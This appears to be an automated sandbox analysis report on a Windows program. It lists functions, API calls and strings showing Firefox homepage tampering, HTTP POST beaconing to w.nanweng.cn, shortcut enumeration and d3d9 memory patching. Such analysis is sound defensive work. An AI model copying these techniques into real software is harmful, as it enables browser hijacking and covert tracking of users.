                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Section$Critical$AddressProc$PrivateProfile$ExistsFilePath$EnterInit_thread_footerInitializeLeaveString$Ios_base_dtorNamesstd::ios_base::_
                                                                                                                                                                                                          • String ID: ");$)@$1@$Default$Install$Path$Profile$\Mozilla\Firefox\$\prefs.js$about:$erPa$profiles.ini$user_pref("browser.startup.homepage", "
                                                                                                                                                                                                          • API String ID: 1618428692-886994478
                                                                                                                                                                                                          • Opcode ID: 6fe38041be1fdfc615b5ce297cc08eeef60a7be6911b008d6ab6d34982a8a5a9
                                                                                                                                                                                                          • Instruction ID: cf5b45e382433dad7b66343c8106350e14a4410f024a3f984de5edf9a9f8b7f0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6fe38041be1fdfc615b5ce297cc08eeef60a7be6911b008d6ab6d34982a8a5a9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63B2A071E002199FDB24CF68CC44BDEBBB5AF46304F1481A9D409B7681DB79AAC4CF96
                                                                                                                                                                                                          Function 00467C10 Relevance: 42.4, APIs: 15, Strings: 9, Instructions: 382networksleepCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 2055 467c10-467cd5 call 5143e0 2058 467ce0-467d22 2055->2058 2059 467d25-467d2a 2058->2059 2059->2059 2060 467d2c-467d82 call 40b8f0 call 5165e0 call 51f098 gethostbyname 2059->2060 2067 468053-46805e Sleep 2060->2067 2068 467d88-467d99 socket 2060->2068 2071 4680b0-4680b3 2067->2071 2072 468060-468066 2067->2072 2069 4680e3 2068->2069 2070 467d9f-467de9 htons connect 2068->2070 2075 4680e5-4680f2 2069->2075 2073 468046-46804d closesocket 2070->2073 2074 467def-467e3b setsockopt * 2 2070->2074 2071->2075 2072->2058 2073->2067 2076 467e86-467f34 call 4681f0 call 408be0 * 2 call 4833e0 call 5165e0 2074->2076 2077 467e3d-467e81 call 5165e0 call 468600 call 408be0 2074->2077 2078 4680f4-468103 2075->2078 2079 468123-46814e 2075->2079 2112 467f37-467f3c 2076->2112 2077->2076 2084 468105-468113 2078->2084 2085 468119-468120 call 513d74 2078->2085 2080 468150-46815f 2079->2080 2081 46817b-4681b5 call 513805 2079->2081 2086 468171-468178 call 513d74 2080->2086 2087 468161-46816f 2080->2087 2084->2085 2092 4681b8 call 51b528 2084->2092 2085->2079 2086->2081 2087->2086 2094 4681bd-4681e5 call 51b528 2087->2094 2092->2094 2112->2112 2113 467f3e-467f6b call 43c970 2112->2113 2116 467f70-467f75 2113->2116 2116->2116 2117 467f77-467fcb call 40b8f0 call 408be0 * 2 call 513da5 2116->2117 2126 467fd1-467ff7 send 2117->2126 2126->2073 2127 467ff9-467ffc 2126->2127 2127->2071 2128 468002-468030 call 5165e0 recv 2127->2128 2131 468032-468044 closesocket Sleep 2128->2131 2132 46806b-468096 closesocket call 516020 2128->2132 2131->2126 2135 4680b8-4680da call 51f399 call 5206e2 2132->2135 2136 468098-4680ae call 516020 2132->2136 2135->2069 2144 4680dc-4680e1 2135->2144 2136->2071 2141 4680b5 2136->2141 2141->2135 2144->2069 2144->2071
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • gethostbyname.WS2_32(w.nanweng.cn), ref: 00467D74
                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 00467D8E
                                                                                                                                                                                                          • htons.WS2_32(00000050), ref: 00467DB7
                                                                                                                                                                                                          • connect.WS2_32(00000000,?,00000010), ref: 00467DE1
                                                                                                                                                                                                          • setsockopt.WS2_32(00000000,0000FFFF,00001005,?), ref: 00467E0D
                                                                                                                                                                                                          • setsockopt.WS2_32(00000000,0000FFFF,00001006,00000BB8,00000004), ref: 00467E27
                                                                                                                                                                                                            • Part of subcall function 004681F0: ___from_strstr_to_strchr.LIBCMT ref: 00468283
                                                                                                                                                                                                            • Part of subcall function 004681F0: ___from_strstr_to_strchr.LIBCMT ref: 00468299
                                                                                                                                                                                                            • Part of subcall function 004681F0: ___from_strstr_to_strchr.LIBCMT ref: 004682E2
                                                                                                                                                                                                            • Part of subcall function 004833E0: MultiByteToWideChar.KERNEL32(000003A8,00000000,-00000808,000000FF,00000000,00000000,?,?,?,-00000808,?,0043952F,00000000,00000000,?), ref: 0048340F
                                                                                                                                                                                                            • Part of subcall function 004833E0: MultiByteToWideChar.KERNEL32(000003A8,00000000,-00000808,000000FF,00000000,?,?,?,?,?,?,?,?), ref: 00483446
                                                                                                                                                                                                            • Part of subcall function 004833E0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0048345E
                                                                                                                                                                                                          • send.WS2_32(00000000,?,?,00000000), ref: 00467FEF
                                                                                                                                                                                                          • recv.WS2_32(00000000,?,00001000,00000000), ref: 00468027
                                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 00468032
                                                                                                                                                                                                          • Sleep.KERNEL32(0000012C,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 0046803E
                                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 00468047
                                                                                                                                                                                                          • Sleep.KERNEL32(0000012C,?,?,?,0054AF36,000000FF), ref: 00468058
                                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 0046806B
                                                                                                                                                                                                          • _strstr.LIBCMT ref: 0046808C
                                                                                                                                                                                                          • _strstr.LIBCMT ref: 004680A4
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide___from_strstr_to_strchrclosesocket$Sleep_strstrsetsockopt$connectgethostbynamehtonsrecvsendsocket
                                                                                                                                                                                                          • String ID: &sig$&type=%d$/qy/ov$/qy/sv$HTTP/1.0$HTTP/1.1$POST %s HTTP/1.1Host: %s Content-Length: %d Connection:closeAccept-Language: zh-cnCache-Conbtrol:no-cacheContent-Type:application/x-www-form-urlencoded$XNtu$w.nanweng.cn
                                                                                                                                                                                                          • API String ID: 293188133-3395050707
                                                                                                                                                                                                          • Opcode ID: 7e932a45503a7cf9c367a48e5592eb9f7211bb9af79cba3000aa024051e5d15c
                                                                                                                                                                                                          • Instruction ID: 20ad16803cbc53e3b9e6f1a94dfd60e8fc27be4d45141a1dc5012682db642f54
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e932a45503a7cf9c367a48e5592eb9f7211bb9af79cba3000aa024051e5d15c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20E1C1719002299BEB20DF54CC4DBDEBBB4BF69304F0141EAE609A7281EB745AC9CF55
                                                                                                                                                                                                          Function 004886E0 Relevance: 40.5, APIs: 16, Strings: 7, Instructions: 256libraryloadertimeCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 2145 4886e0-488730 call 5165e0 call 408180 2150 488732-488752 GetProcAddress 2145->2150 2151 488755-488769 2145->2151 2150->2151 2153 488a0b-488a22 call 513805 2151->2153 2154 48876f-48880f call 5165e0 call 51ac8c * 2 GetLocalTime call 456830 call 408050 2151->2154 2167 488811-488823 GetProcAddress 2154->2167 2168 488826-48883a PathFileExistsA 2154->2168 2167->2168 2169 488989-4889a5 CreateFileA 2168->2169 2170 488840-488880 SetFileAttributesA GetPrivateProfileStringA 2168->2170 2169->2153 2172 4889a7-4889b4 CloseHandle 2169->2172 2171 488883-488887 2170->2171 2173 488889-48888b 2171->2173 2174 4888a3-4888a5 2171->2174 2175 4889b5-4889f1 WritePrivateProfileStringA * 2 2172->2175 2177 48888d-488893 2173->2177 2178 48889f-4888a1 2173->2178 2176 4888a8-4888b1 2174->2176 2179 4889fa 2175->2179 2180 4889f3-4889f8 2175->2180 2176->2175 2182 4888b7-4888f9 GetPrivateProfileIntA * 2 2176->2182 2177->2174 2183 488895-48889d 2177->2183 2178->2176 2181 4889ff-488a09 WritePrivateProfileStringA 2179->2181 2180->2181 2181->2153 2184 4888fb 2182->2184 2185 4888fc-48893b call 488de0 WritePrivateProfileStringA 2182->2185 2183->2171 2183->2178 2184->2185 2188 48893d-488962 WritePrivateProfileStringA call 513805 2185->2188 2189 488963-488988 WritePrivateProfileStringA call 513805 2185->2189
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlInitializeCriticalSection.NTDLL(00597BBC), ref: 004081EE
                                                                                                                                                                                                            • Part of subcall function 00408180: __Init_thread_footer.LIBCMT ref: 0040820A
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlEnterCriticalSection.NTDLL(00597BBC), ref: 00408225
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlLeaveCriticalSection.NTDLL(00597BBC), ref: 0040827B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00488750
                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004887C0
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00488821
                                                                                                                                                                                                          • PathFileExistsA.SHLWAPI(?), ref: 00488830
                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 00488846
                                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(info,time,00000000,?,00000014,?), ref: 00488877
                                                                                                                                                                                                          • GetPrivateProfileIntA.KERNEL32(info,install,00000000,?), ref: 004888C9
                                                                                                                                                                                                          • GetPrivateProfileIntA.KERNEL32(info,round,00000001,?), ref: 004888E0
                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(info,round,?,?), ref: 0048892B
                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(info,install,00578800,?), ref: 0048894C
                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(info,install,00578624,?), ref: 00488972
                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(info,time,?,?), ref: 004889C9
                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(info,round,00578800,?), ref: 004889E1
                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(info,install,00578624,?), ref: 00488A09
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfile$String$Write$CriticalSection$AddressFileProc$AttributesEnterExistsInit_thread_footerInitializeLeaveLocalPathTime
                                                                                                                                                                                                          • String ID: %d-%d-%d$\roundinfo.ini$erPa$info$install$round$time
                                                                                                                                                                                                          • API String ID: 3222017063-1215182308
                                                                                                                                                                                                          • Opcode ID: 1a77383c345253648a27d2d35622dfc4e6db949501e5251d8b5293ddfabaf069
                                                                                                                                                                                                          • Instruction ID: 74520b6e4be4bcd6b7e63c33a4990e336f2dfd45e9c279385226847379a961ad
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a77383c345253648a27d2d35622dfc4e6db949501e5251d8b5293ddfabaf069
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F791F871E40218AADB10DB64EC46FEEBBBCFF14714F404156F509E2180EF75AA88DB55
                                                                                                                                                                                                          Function 0046A5B0 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 131registryCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,75920E50), ref: 0046A5F0
                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0046A60A
                                                                                                                                                                                                          • RegisterClassExW.USER32(00000030), ref: 0046A617
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000), ref: 0046A621
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,DownLoadFrame_splash,00000000,960A0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0046A63E
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000087,ZIP), ref: 0046A65D
                                                                                                                                                                                                          • FindResourceW.KERNEL32(00000000), ref: 0046A660
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000), ref: 0046A674
                                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000), ref: 0046A677
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?), ref: 0046A68B
                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000), ref: 0046A68E
                                                                                                                                                                                                          • FreeResource.KERNEL32(?), ref: 0046A6C4
                                                                                                                                                                                                            • Part of subcall function 00490850: CoInitialize.OLE32(00000000), ref: 00490862
                                                                                                                                                                                                            • Part of subcall function 004909A0: IsWindow.USER32(?), ref: 004909AE
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule$Resource$LoadWindow$ClassCreateCursorFindFreeInitializeRegisterSizeof
                                                                                                                                                                                                          • String ID: 0$0xW$DownLoadFrame_splash$ZIP$start_window
                                                                                                                                                                                                          • API String ID: 909464850-2096845513
                                                                                                                                                                                                          • Opcode ID: d8ad461c0631003e10f27412f44cfaa4357ae0d26e70c484f9914ac28b92c4c6
                                                                                                                                                                                                          • Instruction ID: ad9b6c04108eb9a248668a967f6ccfc5f882ad1d50095b89f64277dc50d21b5c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8ad461c0631003e10f27412f44cfaa4357ae0d26e70c484f9914ac28b92c4c6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55419271A40305BBDB10AFA5EC4AF9FBFB8FF45705F104025F904AA291EA74D510DBA6
                                                                                                                                                                                                          Function 0048BDF0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 141librarynativeloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 2643 48bdf0-48be30 2644 48bf61-48bf80 NtProtectVirtualMemory 2643->2644 2645 48be36-48be49 2643->2645 2653 48bfea-48c007 call 513805 2644->2653 2654 48bf82-48bf85 2644->2654 2646 48be4b-48be5f call 5139d3 2645->2646 2647 48be8d-48bebb RtlEnterCriticalSection 2645->2647 2646->2647 2659 48be61-48be8a RtlInitializeCriticalSection call 513d5f call 513989 2646->2659 2648 48bf4f-48bf5b RtlLeaveCriticalSection 2647->2648 2649 48bec1-48bf24 call 513ac7 LoadLibraryA 2647->2649 2648->2644 2660 48bf3f-48bf49 2649->2660 2661 48bf26-48bf3c GetProcAddress 2649->2661 2658 48bf90-48bfa2 2654->2658 2664 48bfa6-48bfc8 call 48c040 call 516020 2658->2664 2659->2647 2660->2648 2661->2660 2672 48bfca-48bfda call 516020 2664->2672 2673 48bfdc 2664->2673 2672->2673 2675 48bfe1-48bfe8 2672->2675 2673->2675 2675->2653 2675->2658
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(005980E4), ref: 0048BE69
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0048BE85
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(005980E4), ref: 0048BEA6
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(0054C9B4,7591F550), ref: 0048BF19
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0048BF36
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(005980E4), ref: 0048BF5B
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          • NtProtectVirtualMemory.NTDLL(00000020,EFE0703F,00000000,00827338,7591F550), ref: 0048BF66
                                                                                                                                                                                                          • _strstr.LIBCMT ref: 0048BFBE
                                                                                                                                                                                                          • _strstr.LIBCMT ref: 0048BFD0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$_strstr$AddressInit_thread_footerInitializeLibraryLoadMemoryProcProtectVirtual__onexit
                                                                                                                                                                                                          • String ID: .dll$0F$@F$Virtual$d3d9$d3d9.dll
                                                                                                                                                                                                          • API String ID: 3498987271-3011228226
                                                                                                                                                                                                          • Opcode ID: 2f6fec5cb7b27c4d206ec02e00f4b99b2f6c7e52b2bfc0d404402d38f77e4284
                                                                                                                                                                                                          • Instruction ID: f15275ee4044624cbc07a93cf487b0c652e3cd363e09185a1649f875cbd55c32
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f6fec5cb7b27c4d206ec02e00f4b99b2f6c7e52b2bfc0d404402d38f77e4284
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F751E2B0900215DFDB10DF68DC49BAEBBB4FF09704F00856AE618A7291DB749A48CFA4
                                                                                                                                                                                                          Function 00410800 Relevance: 25.1, APIs: 11, Strings: 3, Instructions: 621libraryfileloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 2677 410800-41085c call 5143e0 call 5165e0 call 408180 2684 41088b-41089e 2677->2684 2685 41085e-410888 GetProcAddress 2677->2685 2687 4108a4-4108bc call 408180 2684->2687 2688 41115a-411175 call 513805 2684->2688 2685->2684 2693 4108de-410972 SHGetPathFromIDListW call 5165e0 call 51b5dc * 3 FindFirstFileW 2687->2693 2694 4108be-4108db GetProcAddress 2687->2694 2693->2688 2703 410978 2693->2703 2694->2693 2704 410980-410988 2703->2704 2705 41113d-41114d FindNextFileW 2704->2705 2706 41098e-4109e1 call 5165e0 call 51b578 call 51b5dc 2704->2706 2705->2704 2707 411153-411154 FindClose 2705->2707 2706->2705 2714 4109e7-410a20 CoInitialize CoCreateInstance 2706->2714 2707->2688 2715 411117-41111f 2714->2715 2716 410a26-410a2e 2714->2716 2718 411127-41112f 2715->2718 2719 411121-411123 2715->2719 2717 410a34-410a47 2716->2717 2716->2718 2717->2715 2723 410a4d-410a55 2717->2723 2720 411131-411133 2718->2720 2721 411137 CoUninitialize 2718->2721 2719->2718 2720->2721 2721->2705 2723->2715 2724 410a5b-410aa0 call 5165e0 2723->2724 2724->2715 2729 410aa6-410aef call 5165e0 * 2 2724->2729 2734 410af3-410afb 2729->2734 2734->2715 2735 410b01-410b14 call 515a8a 2734->2735 2735->2715 2738 410b1a-410b44 2735->2738 2739 411111 2738->2739 2740 410b4a 2738->2740 2739->2715 2741 410b50-410b6b 2740->2741 2742 410b71-410b7f 2741->2742 2743 411178 call 40b420 2741->2743 2744 410b81 2742->2744 2745 410b83-410b98 call 408050 call 46da20 2742->2745 2748 41117d-411182 call 40c680 2743->2748 2744->2745 2754 410ec5-410f59 2745->2754 2755 410b9e-410bbd 2745->2755 2756 410f60-410f69 2754->2756 2755->2743 2757 410bc3-410bcf 2755->2757 2756->2756 2758 410f6b-410f8b call 40b650 2756->2758 2759 410bd1 2757->2759 2760 410bd3-410be0 call 5159c3 2757->2760 2765 410f90-410f99 2758->2765 2759->2760 2766 410be2-410c01 2760->2766 2767 410c2f-410c5a 2760->2767 2765->2765 2768 410f9b-411036 call 40b650 call 4119f0 2765->2768 2766->2743 2770 410c07-410c13 2766->2770 2767->2741 2769 410c60 2767->2769 2768->2748 2781 41103c-41108c call 516cc0 2768->2781 2769->2739 2772 410c15 2770->2772 2773 410c17-410c2d call 408050 call 46da20 2770->2773 2772->2773 2773->2767 2782 410c65-410cfd 2773->2782 2787 4110ff-411106 2781->2787 2788 41108e-41109a 2781->2788 2784 410d00-410d09 2782->2784 2784->2784 2786 410d0b-410d2b call 40b650 2784->2786 2798 410d30-410d39 2786->2798 2789 41110c call 411190 2787->2789 2791 4110ec-4110fa call 411d00 2788->2791 2792 41109c-4110ea call 40dee0 * 3 2788->2792 2789->2739 2791->2787 2792->2787 2798->2798 2800 410d3b-410dd6 call 40b650 call 4119f0 2798->2800 2800->2748 2808 410ddc-410e2c call 516cc0 2800->2808 2811 410eb3-410ec0 2808->2811 2812 410e32-410e3e 2808->2812 2811->2789 2813 410ea0-410eae call 411d00 2812->2813 2814 410e40-410e9b call 40dee0 * 3 2812->2814 2813->2811 2814->2789
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlInitializeCriticalSection.NTDLL(00597BBC), ref: 004081EE
                                                                                                                                                                                                            • Part of subcall function 00408180: __Init_thread_footer.LIBCMT ref: 0040820A
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlEnterCriticalSection.NTDLL(00597BBC), ref: 00408225
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlLeaveCriticalSection.NTDLL(00597BBC), ref: 0040827B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00410886
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004108D9
                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(?,?,?,?), ref: 004108EE
                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00410961
                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 004109E9
                                                                                                                                                                                                          • CoCreateInstance.COMBASE(00564920,00000000,00000001,005648E0,?), ref: 00410A18
                                                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 00410B0A
                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 00410BD6
                                                                                                                                                                                                          • CoUninitialize.COMBASE ref: 00411137
                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(00000000,?), ref: 00411145
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00411154
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalFindSection$AddressFileInitializeProc$CloseCreateEnterFirstFromInit_thread_footerInstanceLeaveListNextPathUninitialize_wcschr_wcsrchr
                                                                                                                                                                                                          • String ID: *.lnk$erLo$istW
                                                                                                                                                                                                          • API String ID: 2365766609-1183018039
                                                                                                                                                                                                          • Opcode ID: 756cb243502ccf9dcbfde1438c42cb77981b3990fb4c093f882ea49872d860d3
                                                                                                                                                                                                          • Instruction ID: a0b16b1e9ac4d51bb1c80a6feb5eb2be886ae33204ab1d23e24a08d4a010e1f7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 756cb243502ccf9dcbfde1438c42cb77981b3990fb4c093f882ea49872d860d3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A428C719002599FDB24DF24CD85BDAB7B5AF44304F0445EAE509BB291EBB4AE88CF90
                                                                                                                                                                                                          Function 0048FD60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 143libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0048FD9E
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlInitializeCriticalSection.NTDLL(00597B94), ref: 004080BE
                                                                                                                                                                                                            • Part of subcall function 00408050: __Init_thread_footer.LIBCMT ref: 004080DA
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlEnterCriticalSection.NTDLL(00597B94), ref: 004080F5
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlLeaveCriticalSection.NTDLL(00597B94), ref: 0040814B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0048FDD2
                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 0048FDEF
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 0048FE09
                                                                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(?,?), ref: 0048FE2B
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0048FEFA
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
